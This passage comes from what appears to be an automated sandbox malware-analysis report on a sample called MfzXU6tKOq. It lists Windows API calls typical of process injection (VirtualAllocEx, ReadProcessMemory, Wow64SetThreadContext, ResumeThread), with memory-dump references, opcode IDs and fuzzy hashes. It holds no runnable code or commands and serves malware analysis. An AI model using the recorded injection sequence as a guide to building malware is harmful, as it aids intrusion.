                                                                                                                                                    • Opcode Fuzzy Hash: 59027da59a1c2e5dcac7bc9d242224f5c55d6ccbf5c7c2e24dec6154b793e2c5
                                                                                                                                                    • Instruction Fuzzy Hash: B02157B1D002088FDB50DFAAC4857EEBBF4EF48320F10842AD459A7241CB78A944CFA4
                                                                                                                                                    APIs
                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ABBCE0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1726664587-0
                                                                                                                                                    • Opcode ID: 9da347fcd36007c17f935cbe345eeb7f6a1cb2a22148ff65d3d4d2382ce8896c
                                                                                                                                                    • Instruction ID: df1531db35e1d99d807bba51aea7b4c7c31fc717a002444d960bc02bb827493a
                                                                                                                                                    • Opcode Fuzzy Hash: 9da347fcd36007c17f935cbe345eeb7f6a1cb2a22148ff65d3d4d2382ce8896c
                                                                                                                                                    • Instruction Fuzzy Hash: 4E212AB1C002599FCB10DFAAC880BEEBBF5FF48310F108429E559A7251C7399544CFA5
                                                                                                                                                    APIs
                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,006BD626,?,?,?,?,?), ref: 006BD6E7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1838113803.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6b0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                    • Opcode ID: 6a2710482f3af5fc25df780d1bf3a9337c48cafe3700a92085552a38bd804058
                                                                                                                                                    • Instruction ID: f748308aa62e2089e56ca757473c34b00569fbd33536ee07530581d0ab3e6fe1
                                                                                                                                                    • Opcode Fuzzy Hash: 6a2710482f3af5fc25df780d1bf3a9337c48cafe3700a92085552a38bd804058
                                                                                                                                                    • Instruction Fuzzy Hash: DE21E3B59002489FDB10CFAAD984ADEBBF5EB48310F14842AE918A7310D374A954CFA5
                                                                                                                                                    APIs
                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ABBCE0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1726664587-0
                                                                                                                                                    • Opcode ID: afb39926733eed3a721598925ef82f1a110244adde95b0a59f914351ab5ae8ea
                                                                                                                                                    • Instruction ID: f6c1f7d0fe7dc1eea2284cdd8cbde60a34f1bade0b121edb7796594b4853a902
                                                                                                                                                    • Opcode Fuzzy Hash: afb39926733eed3a721598925ef82f1a110244adde95b0a59f914351ab5ae8ea
                                                                                                                                                    • Instruction Fuzzy Hash: C42128B1C003599FCB10DFAAC880ADEBBF5FF48320F108429E559A7250CB38A544CBA5
                                                                                                                                                    APIs
                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ABBA56
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                                    • Opcode ID: d5d3861f365bc056a0c53f47106bf0d6a05d874d524440a4dcf3d90182f4ba7a
                                                                                                                                                    • Instruction ID: bb414d17c4dd764b5bd77eba842a003362ee051192533736e3eb8773a0e8a881
                                                                                                                                                    • Opcode Fuzzy Hash: d5d3861f365bc056a0c53f47106bf0d6a05d874d524440a4dcf3d90182f4ba7a
                                                                                                                                                    • Instruction Fuzzy Hash: B52135B1D003098FDB10DFAAC4857EEBBF8EF48320F10842AD459A7241CB78A944CFA5
                                                                                                                                                    APIs
                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,006BD626,?,?,?,?,?), ref: 006BD6E7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1838113803.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6b0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                    • Opcode ID: 0aa078d627fa8d8b6520151659a045603a10042bf4b342a7676e7960a59f63f3
                                                                                                                                                    • Instruction ID: 5c49672e0fb3a26cddebc68f3ea0e2798d4784c2b189c39e4b2e7c231d4809d5
                                                                                                                                                    • Opcode Fuzzy Hash: 0aa078d627fa8d8b6520151659a045603a10042bf4b342a7676e7960a59f63f3
                                                                                                                                                    • Instruction Fuzzy Hash: 9B21E0B5900249DFDB10CFA9E584ADEBBF5FF08310F14842AE958A7360D378A944CFA5
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ABBB1E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: 275efadd53f37f426c7bcd9314ed189bffca4c754c244fd09c9cea3c749c2a8d
                                                                                                                                                    • Instruction ID: 9fba27f343a17cae2c4b68ccd08d134996002bc63431482a24ae6c2eddea4b4a
                                                                                                                                                    • Opcode Fuzzy Hash: 275efadd53f37f426c7bcd9314ed189bffca4c754c244fd09c9cea3c749c2a8d
                                                                                                                                                    • Instruction Fuzzy Hash: CF115971C002489FCB14DFA9C844BDEBFF5EF48320F108819E559A7251C7759544CFA0
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ABBB1E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: c22362f53baa3f507ed1743a30b33388af026829bcb288ccfdc8adb802d5700a
                                                                                                                                                    • Instruction ID: fa7eb33c3ac85fff33c0b9f37eceb22d6d036bfefeead073fb316f649f383b0a
                                                                                                                                                    • Opcode Fuzzy Hash: c22362f53baa3f507ed1743a30b33388af026829bcb288ccfdc8adb802d5700a
                                                                                                                                                    • Instruction Fuzzy Hash: 761137719002499FCB10DFAAC844BDFBFF9EF48320F108819E559A7250CB75A544CFA5
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                    • Opcode ID: 77cc0d4a61a6e6984bf9c0f8c514b5fa1807ecdc99287b743847ffedbec955d5
                                                                                                                                                    • Instruction ID: c8ae841a60fcd6a13659b8453ee613d6449d2533fb7d96c447dc801ab8ee0293
                                                                                                                                                    • Opcode Fuzzy Hash: 77cc0d4a61a6e6984bf9c0f8c514b5fa1807ecdc99287b743847ffedbec955d5
                                                                                                                                                    • Instruction Fuzzy Hash: 091119B1D002488FDB14EFAAC4457DEFBF9EB48324F208419D559A7250CB75A544CFA5
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                    • Opcode ID: 03efdb6d1b3e73b18c9df87234c2dca5be331d992c1f719e9479d1a376623f31
                                                                                                                                                    • Instruction ID: a104f300379d568a89e22ba4c04f75cb169db452cfb7ba73c63671a484e41956
                                                                                                                                                    • Opcode Fuzzy Hash: 03efdb6d1b3e73b18c9df87234c2dca5be331d992c1f719e9479d1a376623f31
                                                                                                                                                    • Instruction Fuzzy Hash: DC1128B1D002488FDB10DFAAC4457DEFBF9AB88324F208419D559A7250CB75A544CBA5
                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ABE60D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                                    • Opcode ID: 261eaf279176d617c051a315169937d8e612fa70c77498a86c3c2d98fa3d85a8
                                                                                                                                                    • Instruction ID: 2a4713ad44b192f9bec322ac6d0d793cde0bce7697b132f175531441efd03cbd
                                                                                                                                                    • Opcode Fuzzy Hash: 261eaf279176d617c051a315169937d8e612fa70c77498a86c3c2d98fa3d85a8
                                                                                                                                                    • Instruction Fuzzy Hash: 9A11F2B58003499FDB50DF9AD885BDEFBF8EB48360F10841AE559A7201C375A544CFA5
                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ABE60D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                                    • Opcode ID: 3222c1c8df6212a0fffe82f514db3fc4410c530928445dd1c86a670ab02a4042
                                                                                                                                                    • Instruction ID: 5248929c1d5493ea27cc96239e61baefa09d8ab1dca5964767eee120a5f5fde3
                                                                                                                                                    • Opcode Fuzzy Hash: 3222c1c8df6212a0fffe82f514db3fc4410c530928445dd1c86a670ab02a4042
                                                                                                                                                    • Instruction Fuzzy Hash: 4E11E0B58002499FDB50DF9AD888BDEBBF8EB48320F108419E959A7201D375A944CFA5
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 006BAFDE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1838113803.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6b0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                    • Opcode ID: 6e4ab722781e310593ddeab1107216fd185eda1d4343597544d03ff002742036
                                                                                                                                                    • Instruction ID: 312576766baf236fce9040c8882036dc6aa71f52bc7b1e13fe31079b94267ddd
                                                                                                                                                    • Opcode Fuzzy Hash: 6e4ab722781e310593ddeab1107216fd185eda1d4343597544d03ff002742036
                                                                                                                                                    • Instruction Fuzzy Hash: E711E0B5C006498FCB10DF9AD444ADEFBF9EF88324F10842AD469A7610D379A585CFA6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841959385.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ce0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4ad024cae0aae3013f656a4152343cd79055aa23558fd43660b086d1f447a767
                                                                                                                                                    • Instruction ID: 149dce94e23b6dfaac95684319c0e6a1a4c4e881118d947d5a683b4874b14dfd
                                                                                                                                                    • Opcode Fuzzy Hash: 4ad024cae0aae3013f656a4152343cd79055aa23558fd43660b086d1f447a767
                                                                                                                                                    • Instruction Fuzzy Hash: 1531AD78E103489FDB08DFA9D840ADDBBF6FF48310F04806AE414E7221D7709955CBA0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1837906605.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_65d000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 05f1790639c8ef17e260144617ae2daf2f1b2b6199b31d49355381dbf988a1ce
                                                                                                                                                    • Instruction ID: d34fd800a905726abf6f03380936d307695fd11d96428ada85970a046ece7b78
                                                                                                                                                    • Opcode Fuzzy Hash: 05f1790639c8ef17e260144617ae2daf2f1b2b6199b31d49355381dbf988a1ce
                                                                                                                                                    • Instruction Fuzzy Hash: 7A212871500204DFDB15DF14D9C0B2ABFA6FB94315F20C169DD094B396C336E85AC6A2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1837949000.000000000066D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0066D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_66d000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5ff361de48d41513a1002ec9ce154a9cce59dd6875573a0dace8bb74a4c95413
                                                                                                                                                    • Instruction ID: 9cb1850acd4e215c4ea28e279f12a5c31ee78934298a4e887603374bc02bcacd
                                                                                                                                                    • Opcode Fuzzy Hash: 5ff361de48d41513a1002ec9ce154a9cce59dd6875573a0dace8bb74a4c95413
                                                                                                                                                    • Instruction Fuzzy Hash: 5A212671A04240EFDB05DF14D9D0B26BBAAFB88314F24C66DEA094B396C336D946CA61
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1837949000.000000000066D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0066D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_66d000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 14c20b5ecda9a848128f7e7f1a070fcddff4e7754c83876196b0781d548b7d1c
                                                                                                                                                    • Instruction ID: f6fe4102dcc62fa3ac9952f31d2ab22e558d32636d0a2fbdf161956e37a5a797
                                                                                                                                                    • Opcode Fuzzy Hash: 14c20b5ecda9a848128f7e7f1a070fcddff4e7754c83876196b0781d548b7d1c
                                                                                                                                                    • Instruction Fuzzy Hash: CB21FF75A04240DFCB14DF24D984B26BBA6EB88314F24C569E80A4B396C33BD847CAA1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1837906605.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_65d000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                    • Instruction ID: 92472c010d5531b74f23c8a14a02d39cfe04f21e4b43c731db1ecd7a558518aa
                                                                                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                    • Instruction Fuzzy Hash: 8911DF72404240DFDB16CF00D5C4B56BFB2FB94324F24C2A9DC090B296C33AE85ACBA1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1837949000.000000000066D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0066D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_66d000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction ID: 8c7ed97753d9cc6fe7bbd012e2e11cae8e220831904c1e186971dd4fcf73d4d5
                                                                                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction Fuzzy Hash: C8118E75A04280DFDB15CF14D5C4B55BB62FB84314F24C6AAD8494B756C33AD84ACB61
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1837949000.000000000066D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0066D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_66d000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction ID: ee01581d88d49c9814b32adc0ebdda1ea090fc9d469ec961d0fe3b53458c5f6b
                                                                                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction Fuzzy Hash: 5D11BB75A04280DFCB12CF10C5D4B55BBA2FB84314F28C6AAD9494B396C33AD84ACB61
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1837906605.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_65d000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2ced6c9c2b8da21cb6b580b6af36985bc047b7e4ce051bd056ce793560165659
                                                                                                                                                    • Instruction ID: c78294ea50410b6d8bcd0ba756789caba38a28e0556e38c4ab0c3c3d30dcf8aa
                                                                                                                                                    • Opcode Fuzzy Hash: 2ced6c9c2b8da21cb6b580b6af36985bc047b7e4ce051bd056ce793560165659
                                                                                                                                                    • Instruction Fuzzy Hash: DC01F731008300DAE7208A25CD847A7BF99EF49322F18C82AED080A2C6C239D844C671
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1837906605.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_65d000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cae0fb0b67f1eba4a4bdf848a20f43d36e0ad3ea3a671d80cb787f8f54aba063
                                                                                                                                                    • Instruction ID: e9d62ff7ec0cb31d90590c5c6a76e0f576ad193322b36e344870ebaa60b35071
                                                                                                                                                    • Opcode Fuzzy Hash: cae0fb0b67f1eba4a4bdf848a20f43d36e0ad3ea3a671d80cb787f8f54aba063
                                                                                                                                                    • Instruction Fuzzy Hash: CDF062714043449EE7208A16DC84BA2FFA9EF55725F18C45AED084A3D6C2799844CAB1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841959385.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ce0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f567aca31c3cc48bbc4a175790d52b7e094cd514b34dc744ed654e04c76e93d
                                                                                                                                                    • Instruction ID: b02edc37e6c84cd91f2d5a8f5a83c584af549dea2d45f36c5c2a9ee27d06d1df
                                                                                                                                                    • Opcode Fuzzy Hash: 3f567aca31c3cc48bbc4a175790d52b7e094cd514b34dc744ed654e04c76e93d
                                                                                                                                                    • Instruction Fuzzy Hash: 46F027B0E043519EE350CF2DC404A6BBFF1FF48254B14095DD045EB241EB754402CB90
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841959385.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ce0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6f3167b18b8c664c62cc1219090082ee8465b81366f0d264a4647498ccec1fb7
                                                                                                                                                    • Instruction ID: 4f95eff0b91af4c9ee26a8bca99c44a066a8db9f30995e91b8293120b034f63c
                                                                                                                                                    • Opcode Fuzzy Hash: 6f3167b18b8c664c62cc1219090082ee8465b81366f0d264a4647498ccec1fb7
                                                                                                                                                    • Instruction Fuzzy Hash: 67E039B0E0031A9FD790DF6E8949A6BBBF4BF48604F104829D409E6200EBB08A108BE0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841959385.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ce0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 49318eed26ddecdc6bf6d0bcf3a90066653559e8825e26ee8e196838ccf25752
                                                                                                                                                    • Instruction ID: b4276ade40d7f816d89c73c560a000acd72916b8eea50970d935ea875bd0276c
                                                                                                                                                    • Opcode Fuzzy Hash: 49318eed26ddecdc6bf6d0bcf3a90066653559e8825e26ee8e196838ccf25752
                                                                                                                                                    • Instruction Fuzzy Hash: 4DE09A3A0483869FC7438B20E9619CA3F76BF5631170590E2E854CF273CB32D89ACB50
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1840840096.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_4920000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ec2b94dfed213717ff81e7a1819d97f2ffc0c350a90d4d0b31ede9a09f25001d
                                                                                                                                                    • Instruction ID: 5d823c3719cd7aa7f2bfa5f4f8ffbec9ed1cce814827796f0b508b7606527a63
                                                                                                                                                    • Opcode Fuzzy Hash: ec2b94dfed213717ff81e7a1819d97f2ffc0c350a90d4d0b31ede9a09f25001d
                                                                                                                                                    • Instruction Fuzzy Hash: E21273B0612F468AE710CF65ED8C1A93BB1BB45318B91C209D3626B2F5DBBC154ACF5C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1eea2e1f823d6a4b3de0c5844d0fa3c2b275194bcb70b0152d55a17e11b1bfa4
                                                                                                                                                    • Instruction ID: 013df20a1a622640eab17f872e924568ed24ace383deec3074e00eeb62dcb87c
                                                                                                                                                    • Opcode Fuzzy Hash: 1eea2e1f823d6a4b3de0c5844d0fa3c2b275194bcb70b0152d55a17e11b1bfa4
                                                                                                                                                    • Instruction Fuzzy Hash: 6FE11874E001198FCB54DFA9C5809AEFBB6FF89340F24D169E514AB35AD730A941CFA0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 934ae34650e3c1f952f4e71f0c995a1cb5e7e77af9a27fba35d0907a2e2e027f
                                                                                                                                                    • Instruction ID: 361095185a1645fa92236a279958c92accd5720a51ed370b18475228d1ef127d
                                                                                                                                                    • Opcode Fuzzy Hash: 934ae34650e3c1f952f4e71f0c995a1cb5e7e77af9a27fba35d0907a2e2e027f
                                                                                                                                                    • Instruction Fuzzy Hash: 56E10974E001198FCB54DFA9C5809AEFBB6FF89305F24D169E518AB35AD730A941CFA0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: dad68cc7b37522860454749d0be96416f5496a2cc8e48e89d51f400d01ec37b7
                                                                                                                                                    • Instruction ID: 38c0aa9dc32e75ad35ac3051bc4fd6b7a40bd525189119468277b09f5bde3936
                                                                                                                                                    • Opcode Fuzzy Hash: dad68cc7b37522860454749d0be96416f5496a2cc8e48e89d51f400d01ec37b7
                                                                                                                                                    • Instruction Fuzzy Hash: 24E1F974E001198FCB54DFA9C5809AEFBB6FF89304F24D169E815AB35ADB30A941CF61
                                                                                                                                                    Memory Dump Source
